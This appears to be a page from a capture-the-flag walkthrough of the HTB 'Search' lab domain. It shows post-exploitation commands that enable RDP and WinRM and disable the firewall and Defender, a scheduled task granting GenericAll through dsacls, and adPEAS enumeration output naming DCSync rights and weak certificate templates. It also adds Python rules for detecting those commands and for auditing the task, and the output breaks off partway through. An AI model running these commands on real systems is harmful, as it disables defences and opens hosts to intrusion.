Beyond


This is the beyond page, where additional post-exploitation enumeration and assessment are conducted as SYSTEM after compromising the target domain.

PS C:\> Enable-PSRemoting -Force
WinRM is already set up to receive requests on this computer.
WinRM has been updated for remote management.
WinRM firewall exception enabled. 
 
 
PS C:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
 
PS C:\> netsh firewall add portopening TCP 3389 "Remote Desktop"
 
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.

WinRM & RDP enabled

*Evil-WinRM* PS C:\Users\Tristan.Davies> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
*Evil-WinRM* PS C:\Users\Tristan.Davies> Set-MpPreference -DisableRealtimeMonitoring $true
*Evil-WinRM* PS C:\Users\Tristan.Davies> Set-MpPreference -DisableIOAVProtection $true
*Evil-WinRM* PS C:\Users\Tristan.Davies> Set-MpPreference -DisableScriptScanning 1

AV & FW disabled
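The commands above (enabling PSRemoting and RDP, opening the firewall, then switching off Defender and the firewall profiles) are exactly what a defender wants to catch in PowerShell script-block logging. As an added example that is not part of the original writeup, the following Python rule set scans constructed log lines shaped like Event ID 4104 script-block text (the transcript's commands plus two benign lines to check for false positives) and maps each hit to an ATT&CK technique. The rule names, the log format and the technique mapping are assumptions made for this example.

```python
"""Flag PowerShell/cmd lines that weaken host defences or open remote access.

Added example (not from the original writeup): a small rule set run over
constructed log lines shaped like PowerShell ScriptBlock text (Event ID 4104).
The sample lines reuse the commands from the transcript plus two benign lines.
"""
import re
from collections import Counter

# (rule name, pattern, ATT&CK technique) -- technique mapping chosen for this example
RULES = [
    ("psremoting-enabled",
     re.compile(r"\bEnable-PSRemoting\b", re.I), "T1021.006"),
    ("rdp-enabled-via-registry",
     re.compile(r"\bfDenyTSConnections\b.*\s/d\s+0\b", re.I), "T1021.001"),
    ("firewall-legacy-portopen",
     re.compile(r"\bnetsh\s+(advfirewall\s+)?firewall\s+add\s+(portopening|rule)\b", re.I), "T1562.004"),
    ("firewall-profile-off",
     re.compile(r"\bSet-NetFirewallProfile\b.*-Enabled\s+(\$false|False|0)\b", re.I), "T1562.004"),
    ("defender-realtime-off",
     re.compile(r"\bSet-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|True|1)\b", re.I), "T1562.001"),
    ("defender-ioav-off",
     re.compile(r"\bSet-MpPreference\b.*-DisableIOAVProtection\s+(\$true|True|1)\b", re.I), "T1562.001"),
    ("defender-scriptscan-off",
     re.compile(r"\bSet-MpPreference\b.*-DisableScriptScanning\s+(\$true|True|1)\b", re.I), "T1562.001"),
]

# Constructed sample: the commands from the transcript above, plus two benign lines.
SAMPLE_LOG = [
    'Enable-PSRemoting -Force',
    r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    'netsh firewall add portopening TCP 3389 "Remote Desktop"',
    'Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False',
    'Set-MpPreference -DisableRealtimeMonitoring $true',
    'Set-MpPreference -DisableIOAVProtection $true',
    'Set-MpPreference -DisableScriptScanning 1',
    'Get-MpPreference',                                      # benign: read-only query
    'Set-NetFirewallProfile -Profile Domain -Enabled True',  # benign: re-enables the profile
]


def scan(lines):
    """Return (line_no, rule_name, technique, line) for every rule that matches a line."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, rx, technique in RULES:
            if rx.search(line):
                hits.append((n, name, technique, line.strip()))
    return hits


def summarize(hits):
    """Count hits per technique; several techniques in one session is the real signal."""
    return dict(Counter(h[2] for h in hits))


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(summarize(scan(SAMPLE_LOG)))
```

Individually, each of these commands has legitimate administrative uses; the useful alert is the cluster (remote access enabled, firewall off, Defender off) from one session in a short window, which is what the summary view is for.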

Scheduled Tasks


*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
 
TaskName TaskPath State
-------- -------- -----
Perms    \        Ready
 
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> cmd /c schtasks /QUERY /TN \Perms /V /FO LIST
 
Folder: \
HostName:                             RESEARCH
TaskName:                             \Perms
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        31/01/2024 14:13:04
Last Result:                          0
Author:                               SEARCH\Administrator
Task To Run:                          C:\Windows\Tasks\perms.bat
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Administrator
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

C:\Windows\Tasks\perms.bat


*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> cat C:\Windows\Tasks\perms.bat
dsacls "cn=tristan davies,cn=users,dc=search,dc=htb" /g "s-1-5-21-271492789-1610487937-1871574529-1299:GA
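The task above runs a batch file from C:\Windows\Tasks as Administrator at every boot, and the SID it grants GA (GenericAll) over the Tristan Davies object to (…-1299) is the objectSid adPEAS reports for BIR-ADFS-GMSA$ further down this page. As an added example that is not part of the original writeup, the Python below parses the `schtasks /QUERY /V /FO LIST` output and the perms.bat line shown above (embedded as strings) and rates the task the way a scheduled-task audit would. The list of loosely permissioned directories and the dsacls rights table are assumptions made for this example.

```python
"""Audit a task from `schtasks /QUERY /V /FO LIST` and decode the dsacls grant it runs.

Added example, not part of the original writeup.  The sample text is the Perms
task and perms.bat contents shown above, embedded as strings; the loose-directory
list and the rights table are assumptions made for this example.
"""
import re

# Constructed from the transcript above (trimmed to the fields the audit needs).
SCHTASKS_LIST = r"""
Folder: \
HostName:                             RESEARCH
TaskName:                             \Perms
Status:                               Ready
Last Run Time:                        31/01/2024 14:13:04
Author:                               SEARCH\Administrator
Task To Run:                          C:\Windows\Tasks\perms.bat
Scheduled Task State:                 Enabled
Run As User:                          Administrator
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule Type:                        At system start up
"""

PERMS_BAT = r'dsacls "cn=tristan davies,cn=users,dc=search,dc=htb" /g "s-1-5-21-271492789-1610487937-1871574529-1299:GA'

# Greedy so that the LAST ':' followed by whitespace splits key from value; this keeps
# keys like "Repeat: Every" and values like "72:00:00" intact.
KV_RX = re.compile(r"^(.*):\s+(.*)$")


def parse_schtasks_list(text):
    """Turn the LIST format into a dict of field -> value."""
    task = {}
    for line in text.splitlines():
        m = KV_RX.match(line.rstrip())
        if m:
            task[m.group(1).strip()] = m.group(2).strip()
    return task


PRIVILEGED = {"administrator", "system", "nt authority\\system"}
SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js")
# Directories that on a default install let non-administrators create files.
# Assumption for this example; confirm on the host under review with: icacls <dir>
LOOSE_DIRS = (r"c:\windows\tasks", r"c:\windows\temp", r"c:\users\public")


def assess_task(task):
    """Return short finding codes for the risky properties of one task."""
    findings = []
    run_as = task.get("Run As User", "").lower()
    if run_as in PRIVILEGED or run_as.endswith("\\administrator"):
        findings.append("runs-as-privileged")
    if "start up" in task.get("Schedule Type", "").lower():
        findings.append("startup-trigger")
    action = task.get("Task To Run", "").strip('"').lower()
    if action.endswith(SCRIPT_EXT):
        findings.append("script-action")          # editable text, not a signed binary
    if any(action.startswith(d + "\\") for d in LOOSE_DIRS):
        findings.append("action-in-loose-dir")    # low-priv users may be able to replace it
    return findings


def severity(findings):
    f = set(findings)
    if "runs-as-privileged" in f and ("action-in-loose-dir" in f or "script-action" in f):
        return "high"
    return "medium" if "runs-as-privileged" in f else "low"


# dsacls generic/specific right codes (subset); assumption: codes are concatenated in pairs.
DSACLS_RIGHTS = {"GA": "Generic All", "GR": "Generic Read", "GW": "Generic Write",
                 "GE": "Generic Execute", "WD": "Modify Permissions", "WO": "Modify Owner",
                 "CC": "Create Child", "DC": "Delete Child", "WP": "Write Property",
                 "RP": "Read Property", "CA": "Control Access", "SD": "Delete"}
# Closing quote optional: the batch file on the page omits it.
DSACLS_RX = re.compile(r'dsacls\s+"([^"]+)"\s+/g\s+"?([^":\s]+):([A-Za-z]+)"?', re.I)


def parse_dsacls(cmd):
    """Extract target DN, trustee and decoded rights from a `dsacls ... /g` line."""
    m = DSACLS_RX.search(cmd)
    if not m:
        return None
    target, trustee, codes = m.groups()
    rights = [DSACLS_RIGHTS.get(codes[i:i + 2].upper(), codes[i:i + 2]) for i in range(0, len(codes), 2)]
    rid = int(trustee.rsplit("-", 1)[1]) if trustee.lower().startswith("s-1-") else None
    return {"target": target, "trustee": trustee, "trustee_rid": rid, "rights": rights}


if __name__ == "__main__":
    task = parse_schtasks_list(SCHTASKS_LIST)
    found = assess_task(task)
    print(task["TaskName"], severity(found), found)
    print(parse_dsacls(PERMS_BAT))
```

On the page's own task this rates "high": a privileged, boot-time task executing an editable script from a directory that standard users can typically write to, and the script itself hands GenericAll on a Domain Admin account to a service account. Either property on its own is worth a ticket; together they are a persistence and escalation path that should be removed rather than tolerated.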

Installed Programs


*Evil-WinRM* PS C:\> ls
 
 
    Directory: C:\
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/14/2020  11:24 AM                HelpDesk
d-----        3/23/2020   7:20 AM                inetpub
d-----        7/30/2020   3:43 PM                PerfLogs
d-r---        4/13/2022  12:21 PM                Program Files
d-----        9/15/2018   8:21 AM                Program Files (x86)
d-----        1/30/2024   5:31 PM                RedirectedFolders
d-r---        1/31/2024  10:46 AM                Users
d-----        1/31/2024  10:26 AM                Windows
-a----        1/31/2024  10:25 AM             90 __1706696618.39789
-a----        1/31/2024  10:26 AM             21 __output
 
 
*Evil-WinRM* PS C:\> ls "Program Files"
 
 
    Directory: C:\Program Files
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/26/2020  10:24 AM                common files
d-----        9/15/2018   8:12 AM                internet explorer
d-----        7/31/2020   9:06 AM                PackageManagement
d-----        4/13/2022  12:21 PM                VMware
d-----        5/24/2021   9:42 AM                Windows Defender
d-----       11/22/2021   8:17 PM                Windows Defender Advanced Threat Protection
d-----        7/31/2020   9:06 AM                WindowsPowerShell
 
 
*Evil-WinRM* PS C:\> ls "Program Files (x86)"
 
 
    Directory: C:\Program Files (x86)
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/15/2018   8:21 AM                common files
d-----        9/15/2018   8:12 AM                internet explorer
d-----        9/15/2018   8:12 AM                Microsoft.NET
d-----        5/24/2021   9:42 AM                Windows Defender
d-----        9/15/2018   8:12 AM                WindowsPowerShell
 
 
*Evil-WinRM* PS C:\> ls "ProgramData"
 
 
    Directory: C:\ProgramData
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/13/2023   2:59 PM                Corefig
d---s-        1/31/2024  10:48 AM                Microsoft
d-----        4/13/2022  12:20 PM                Package Cache
d-----        1/30/2024   9:07 AM                regid.1991-06.com.microsoft
d-----        9/15/2018   8:12 AM                SoftwareDistribution
d-----        3/23/2020   1:31 PM                ssh
d-----        3/22/2020  11:51 PM                USOPrivate
d-----        3/22/2020  11:51 PM                USOShared
d-----       12/16/2021   5:08 PM                VMware

Web


*Evil-WinRM* PS C:\inetpub> ls
 
 
    Directory: C:\inetpub
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/23/2020   7:20 AM                custerr
d-----        8/11/2020   9:45 AM                history
d-----         4/7/2020  10:05 AM                logs
d-----         4/7/2020   8:26 AM                temp
d-----         4/9/2020   8:56 AM                wwwroot
 
 
*Evil-WinRM* PS C:\inetpub> cd wwwroot
*Evil-WinRM* PS C:\inetpub\wwwroot> ls
 
 
    Directory: C:\inetpub\wwwroot
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         4/9/2020   8:55 AM                css
d-----         4/9/2020   8:55 AM                fonts
d-----         4/9/2020   8:55 AM                images
d-----         4/9/2020   8:55 AM                js
d-----         4/9/2020   8:55 AM                scss
-a----        8/11/2020  11:13 AM          44982 index.html
-a----        9/24/2019  11:22 AM            931 main.html
-a----       12/27/2019   8:20 AM          16521 prepros-6.config
-a----         4/9/2020   8:55 AM          19559 single.html

Static

adPEAS


*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> . .\adPEAS.ps1
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> Invoke-adPEAS
 
               _ _____  ______           _____
              | |  __ \|  ____|   /\    / ____|
      ____  __| | |__) | |__     /  \  | (___
     / _  |/ _  |  ___/|  __|   / /\ \  \___ \
    | (_| | (_| | |    | |____ / ____ \ ____) |
     \__,_|\__,_|_|    |______/_/    \_\_____/
                                            Version 0.8.13
 
    Active Directory Enumeration
    by @61106960
 
    Legend
        [?] Searching for juicy information
        [!] Found a vulnerability which may can be exploited in some way
        [+] Found some interesting information for further investigation
        [*] Some kind of note
        [#] Reserved
 
 
[?] +++++ Searching for Juicy Active Directory Information +++++
 
[?] +++++ Checking General Domain Information +++++
[+] Found general Active Directory domain information for domain 'search.htb':
Domain Name:				search.htb
Domain SID:				S-1-5-21-271492789-1610487937-1871574529
Domain Functional Level:		Windows 2016
Forest Name:				search.htb
Forest Children:			No Subdomain[s] available
Domain Controller:			Research.search.htb
 
[?] +++++ Checking Domain Policies +++++
[+] Found password policy of domain 'search.htb':
Minimum Password Age:			1 days
[!] Maximum Password Age:		Disabled
[+] Minimum Password Length:		7 character
[!] Password Complexity:		Disabled
[!] Lockout Account:			Disabled
Reversible Encryption:			Disabled
[+] Found Kerberos policy of domain 'search.htb':
Maximum Age of TGT:			10 hours
Maximum Age of TGS:			600 minutes
Maximum Clock Time Difference:		5 minutes
Krbtgt Password Last Set:		03/31/2020 15:19:36
 
[?] +++++ Checking Domain Controller, Sites and Subnets +++++
[+] Found domain controller of domain 'search.htb':
DC Host Name:				Research.search.htb
DC Roles:				SchemaRole,NamingRole,PdcRole,RidRole,InfrastructureRole
DC IP Address:				fe80::a950:56b9:6c45:e1ce%6
Site Name:				Default-First-Site-Name
 
[+] Found configured sites and IP subnets of domain 'search.htb':
Site IP Subnet:				172.22.20.0/23	(Site: Birmingham)
Site IP Subnet:				172.22.22.0/23	(Site: Glasgow)
Site IP Subnet:				172.22.24.0/23	(Site: London)
Site IP Subnet:				172.22.26.0/23	(Site: Manchester)
Site IP Subnet:				172.22.28.0/23	(Site: Newcastle)
Site IP Subnet:				172.22.30.0/23	(Site: Sheffield)
 
[?] +++++ Checking Forest and Domain Trusts +++++
 
[?] +++++ Checking Juicy Permissions +++++
 
[?] +++++ Checking Add-Computer Permissions +++++
[+] Filtering found identities that can add a computer object to domain '':
sAMAccountName:				Domain Admins
distinguishedName:			CN=Domain Admins,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-512
memberOf:				CN=Denied RODC Password Replication Group,CN=Users,DC=search,DC=htb
					CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description:			Designated administrators of the domain
[+] admincount:				This identity is or was member of a high privileged admin group
 
[+] The identity 'HelpDesk' is a non-default account and can add computer to the domain
sAMAccountName:				HelpDesk
distinguishedName:			CN=HelpDesk,OU=Sites,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1294
 
 
[?] +++++ Checking DCSync Permissions +++++
[+] Filtering found identities that can perform DCSync in domain '':
[+] The identity 'Tristan.Davies' is a non-default account and can DCSync a domain controller
sAMAccountName:				Tristan.Davies
userPrincipalName:			Tristan.Davies@search.htb
distinguishedName:			CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1298
memberOf:				CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
					CN=Domain Admins,CN=Users,DC=search,DC=htb
					CN=Enterprise Admins,CN=Users,DC=search,DC=htb
					CN=Schema Admins,CN=Users,DC=search,DC=htb
					CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description:			The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet:				01/31/2024 10:08:55
lastLogonTimestamp:			01/31/2024 10:12:00
userAccountControl:			NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount:				This identity is or was member of a high privileged admin group
 
 
[?] +++++ Checking LAPS Permissions +++++
 
[?] +++++ Searching for GPO local group membership Information +++++
[+] Found GPO 'Default Domain Policy' which adds member[s] to local group'Remote Desktop Users (built-in)'
GPO Name:				Default Domain Policy
Local GroupName:			Remote Desktop Users (built-in)
Local GroupSID:				S-1-5-32-555
GroupMembers:				SEARCH\Domain Users
 
[?] +++++ Searching for Active Directory Certificate Services Information +++++
[+] Found at least one available Active Directory Certificate Service
adPEAS does basic enumeration only, consider reading https://posts.specterops.io/certified-pre-owned-d95910965cd2
 
[+] Found Active Directory Certificate Services 'search-RESEARCH-CA':
CA Name:				search-RESEARCH-CA
CA dnshostname:				Research.search.htb
CA IP Address:				10.10.11.129
Date of Creation:			04/07/2020 07:29:30
DistinguishedName:			CN=search-RESEARCH-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
NTAuthCertificates:			True
Available Templates:			ITSecOps
					WebServers
					DirectoryEmailReplication
					DomainControllerAuthentication
					KerberosAuthentication
					EFSRecovery
					EFS
					DomainController
					WebServer
					Machine
					User
					SubCA
					Administrator
 
[?] +++++ Searching for Vulnerable Certificate Templates +++++
adPEAS does basic enumeration only, consider using https://github.com/GhostPack/Certify or https://github.com/ly4k/Certipy
 
[?] +++++ Checking Template 'ITSecOps' +++++
[+] Identity 'SEARCH\ITSec' has enrollment rights for template 'ITSecOps'
[+] Identity 'SEARCH\Domain Users' has enrollment rights for template 'ITSecOps'
Template Name:				ITSecOps
Template distinguishedname:		CN=ITSecOps,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation:			04/07/2020 12:45:26
[+] Extended Key Usage:			Client Authentication
EnrollmentFlag:				INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag:			SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for:		SEARCH\ITSec
					SEARCH\Domain Users
 
[?] +++++ Checking Template 'WebServers' +++++
[!] Template 'WebServers' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:				WebServers
Template distinguishedname:		CN=WebServers,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation:			04/07/2020 10:07:27
Extended Key Usage:			Server Authentication
EnrollmentFlag:				0
[!] CertificateNameFlag:		ENROLLEE_SUPPLIES_SUBJECT
 
[?] +++++ Checking Template 'DirectoryEmailReplication' +++++
 
[?] +++++ Checking Template 'DomainControllerAuthentication' +++++
 
[?] +++++ Checking Template 'KerberosAuthentication' +++++
 
[?] +++++ Checking Template 'EFSRecovery' +++++
 
[?] +++++ Checking Template 'EFS' +++++
[+] Identity 'SEARCH\Domain Users' has enrollment rights for template 'EFS'
Template Name:				EFS
Template distinguishedname:		CN=EFS,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation:			04/07/2020 07:29:30
Extended Key Usage:			Encrypting File System
EnrollmentFlag:				INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag:			SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for:		SEARCH\Domain Users
 
[?] +++++ Checking Template 'DomainController' +++++
 
[?] +++++ Checking Template 'WebServer' +++++
[!] Template 'WebServer' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:				WebServer
Template distinguishedname:		CN=WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation:			04/07/2020 07:29:30
Extended Key Usage:			Server Authentication
EnrollmentFlag:				0
[!] CertificateNameFlag:		ENROLLEE_SUPPLIES_SUBJECT
 
[?] +++++ Checking Template 'Machine' +++++
[+] Identity 'SEARCH\Domain Computers' has enrollment rights for template 'Machine'
Template Name:				Machine
Template distinguishedname:		CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation:			04/07/2020 07:29:30
[+] Extended Key Usage:			Client Authentication, Server Authentication
EnrollmentFlag:				AUTO_ENROLLMENT
CertificateNameFlag:			SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
[+] Enrollment allowed for:		SEARCH\Domain Computers
 
[?] +++++ Checking Template 'User' +++++
[+] Identity 'SEARCH\Domain Users' has enrollment rights for template 'User'
Template Name:				User
Template distinguishedname:		CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation:			04/07/2020 07:29:30
[+] Extended Key Usage:			Encrypting File System, Secure E-mail, Client Authentication
EnrollmentFlag:				INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag:			SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for:		SEARCH\Domain Users
 
[?] +++++ Checking Template 'SubCA' +++++
[!] Template 'SubCA' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:				SubCA
Template distinguishedname:		CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation:			04/07/2020 07:29:30
EnrollmentFlag:				0
[!] CertificateNameFlag:		ENROLLEE_SUPPLIES_SUBJECT
 
[?] +++++ Checking Template 'Administrator' +++++
 
[?] +++++ Searching for Credentials Exposure +++++
 
[?] +++++ Searching for ASREProastable User +++++
 
[?] +++++ Searching for Kerberoastable User +++++
Warning: [Get-DomainSPNTicket] Error requesting ticket for SPN 'RESEARCH/web_svc.search.htb:60001' from user 'CN=Web Service,OU=Users,OU=Sheffield,OU=Sites,DC=search,DC=htb' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details."
 
[?] +++++ Searching for User with 'Linux/Unix Password' attribute +++++
 
[?] +++++ Searching for Computer with enabled and readable LAPS attribute +++++
 
[?] +++++ Searching for Group Managed Service Account (gMSA) +++++
[+] Found group Managed Service Account 'BIR-ADFS-GMSA$':
sAMAccountName:				BIR-ADFS-GMSA$
distinguishedName:			CN=BIR-ADFS-GMSA,CN=Managed Service Accounts,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1299
[+] description:			ADFS on Covid
[+] AllowedToRetrieveManagedPassword:	Sheffield-ITSec
					Rene.Larson
					Glasgow-ITSec
					Abby.Gonzalez
					Manchester-ITSec
					Camren.Luna
					Birmingham-ITSec
					Sierra.Frye
					London-ITSec
					Keely.Lyons
pwdLastSet:				04/09/2020 10:05:04
lastLogonTimestamp:			01/31/2024 01:10:28
userAccountControl:			WORKSTATION_TRUST_ACCOUNT
 
 
[?] +++++ Searching for Credentials in SYSVOL Group Policy Files +++++
 
[?] +++++ Searching for Sensitive Information in NETLOGON Share +++++
 
[?] +++++ Searching for Delegation Issues +++++
 
[?] +++++ Searching for Computer with Unconstrained Delegation Rights +++++
 
[?] +++++ Searching for Computer with Constrained Delegation Rights +++++
 
[?] +++++ Searching for Computer with Resource-Based Constrained Delegation Rights +++++
 
[?] +++++ Searching for User with Constrained Delegation Rights +++++
 
[?] +++++ Searching for User with Resource-Based Constrained Delegation Rights +++++
 
[?] +++++ Starting Account Enumeration +++++
 
[?] +++++ Searching for Azure AD Connect +++++
 
[?] +++++ Searching for Users in High Privileged Groups +++++
[+] Found members in group 'BUILTIN\Administrators':
GroupName:				Enterprise Admins
distinguishedName:			CN=Enterprise Admins,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-519
[+] description:			Designated administrators of the enterprise
 
GroupName:				Domain Admins
distinguishedName:			CN=Domain Admins,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-512
[+] description:			Designated administrators of the domain
 
sAMAccountName:				Tristan.Davies
userPrincipalName:			Tristan.Davies@search.htb
distinguishedName:			CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1298
memberOf:				CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
					CN=Domain Admins,CN=Users,DC=search,DC=htb
					CN=Enterprise Admins,CN=Users,DC=search,DC=htb
					CN=Schema Admins,CN=Users,DC=search,DC=htb
					CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description:			The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet:				01/31/2024 10:08:55
lastLogonTimestamp:			01/31/2024 10:12:00
userAccountControl:			NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount:				This identity is or was member of a high privileged admin group
 
sAMAccountName:				Administrator
distinguishedName:			CN=Administrator,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-500
memberOf:				CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
					CN=Domain Admins,CN=Users,DC=search,DC=htb
					CN=Enterprise Admins,CN=Users,DC=search,DC=htb
					CN=Schema Admins,CN=Users,DC=search,DC=htb
					CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description:			Built-in account for administering the computer/domain
pwdLastSet:				04/14/2020 14:38:29
lastLogonTimestamp:			01/30/2024 09:08:40
userAccountControl:			NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount:				This identity is or was member of a high privileged admin group
 
[+] Found members in group 'SEARCH\Domain Admins':
sAMAccountName:				Tristan.Davies
userPrincipalName:			Tristan.Davies@search.htb
distinguishedName:			CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1298
memberOf:				CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
					CN=Domain Admins,CN=Users,DC=search,DC=htb
					CN=Enterprise Admins,CN=Users,DC=search,DC=htb
					CN=Schema Admins,CN=Users,DC=search,DC=htb
					CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description:			The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet:				01/31/2024 10:08:55
lastLogonTimestamp:			01/31/2024 10:12:00
userAccountControl:			NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount:				This identity is or was member of a high privileged admin group
 
sAMAccountName:				Administrator
distinguishedName:			CN=Administrator,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-500
memberOf:				CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
					CN=Domain Admins,CN=Users,DC=search,DC=htb
					CN=Enterprise Admins,CN=Users,DC=search,DC=htb
					CN=Schema Admins,CN=Users,DC=search,DC=htb
					CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description:			Built-in account for administering the computer/domain
pwdLastSet:				04/14/2020 14:38:29
lastLogonTimestamp:			01/30/2024 09:08:40
userAccountControl:			NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount:				This identity is or was member of a high privileged admin group
 
[+] Found members in group 'SEARCH\Enterprise Admins':
sAMAccountName:				Tristan.Davies
userPrincipalName:			Tristan.Davies@search.htb
distinguishedName:			CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-1298
memberOf:				CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
					CN=Domain Admins,CN=Users,DC=search,DC=htb
					CN=Enterprise Admins,CN=Users,DC=search,DC=htb
					CN=Schema Admins,CN=Users,DC=search,DC=htb
					CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description:			The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet:				01/31/2024 10:08:55
lastLogonTimestamp:			01/31/2024 10:12:00
userAccountControl:			NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount:				This identity is or was member of a high privileged admin group
 
sAMAccountName:				Administrator
distinguishedName:			CN=Administrator,CN=Users,DC=search,DC=htb
objectSid:				S-1-5-21-271492789-1610487937-1871574529-500
memberOf:				CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
					CN=Domain Admins,CN=Users,DC=search,DC=htb
					CN=Enterprise Admins,CN=Users,DC=search,DC=htb
					CN=Schema Admins,CN=Users,DC=search,DC=htb
					CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description:			Built-in account for administering the computer/domain
pwdLastSet:				04/14/2020 14:38:29
lastLogonTimestamp:			01/30/2024 09:08:40
userAccountControl:			NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount:				This identity is or was member of a high privileged admin group
 
[+] Found members in group 'SEARCH\Group Policy Creator Owners':
sAMAccountName:				Tristan.Davies
